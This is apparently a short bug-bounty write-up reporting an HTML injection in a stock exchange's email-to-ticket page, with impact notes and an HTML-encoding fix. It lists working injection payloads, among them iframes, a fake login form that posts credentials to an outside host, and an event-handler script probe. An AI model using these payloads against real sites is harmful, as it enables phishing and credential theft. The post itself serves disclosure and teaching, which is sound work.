My first bug | HTML injection

Pandeyrishu
Published in System Weakness
2 min read · Feb 7, 2024


I reported a bug to a stock exchange company. I don't want to disclose the name of the company, so I will call it "target".

It was my first non-duplicate valid bug.

Description

HTML injection is a vulnerability in which user-supplied input is rendered into a web page without being encoded, so markup supplied by an attacker is interpreted by the browser as HTML and becomes part of the site's own content.

Steps To Reproduce

  • The target receives complaints through email and creates a ticket that is shown on the website.
  • So I sent the payloads below to the target through email and viewed the ticket on the website.
  • I found that the payload was triggered.

Payloads:
<button type="button">Click Me!</button>
<canvas id="myCanvas">draw htmli</canvas>
<caption>Html</caption>
<cite>Html Html</cite>
<code>Html</code>
<head><base href="https://www.google.com" target="_blank"></head>
<span style="color:blue;font-weight:bold">html</span>
<abbr title="HTML">HTML</abbr>
<acronym title="Armour Infosec">AI</acronym>
<address>address,address</address>
<iframe id="if1" src="https://www.google.com"></iframe>
<iframe id="if2" src="https://www.google.com"></iframe>
<<h1>HTML</h1>
<<h1>HTML</h1>>

<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.test.com/">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
<input><input"/onmouseover="confirm(3333);//"onload=onload><input><innerHTML><img src="https://www.petmd.com/sites/default/files/Acute-Dog-Diarrhea-47066074.jpg" width="1000" height="750" alt="onmouseover=prompt(1);//" /></a></input>

  • The last payload creates a phishing page on the website.

Impact

HTML injection lets an attacker place their own markup in the ticket page, which is served under the target's domain. The phishing form payload above renders a fake login form whose POST action points to an address the attacker chooses, so credentials typed in by staff viewing the ticket are sent to the attacker, and the iframe payloads load external content inside the page. This can lead to loss of reputation and to credential theft or data leakage. Plain HTML injection does not execute commands on the server; its impact comes from what the browser renders for the victim.

Suggested Fix

HTML encoding: HTML encoding converts characters that have meaning in HTML, such as <, >, &, " and ', into their corresponding character entities (&lt;, &gt;, &amp;, &quot;, &#x27;). Applying it to the email subject and body at the point where the ticket is rendered ensures that user-submitted data is displayed as plain text rather than interpreted as HTML, which prevents this injection. Most template engines do this automatically for interpolated values, as long as the "raw" or "unsafe" output helper is not used for untrusted data.

> I reported the bug on 4th February.

> I got a response on 7th February that the bug was informational, and they provided me with some swag.

> On 20th February I received the swag from the company.
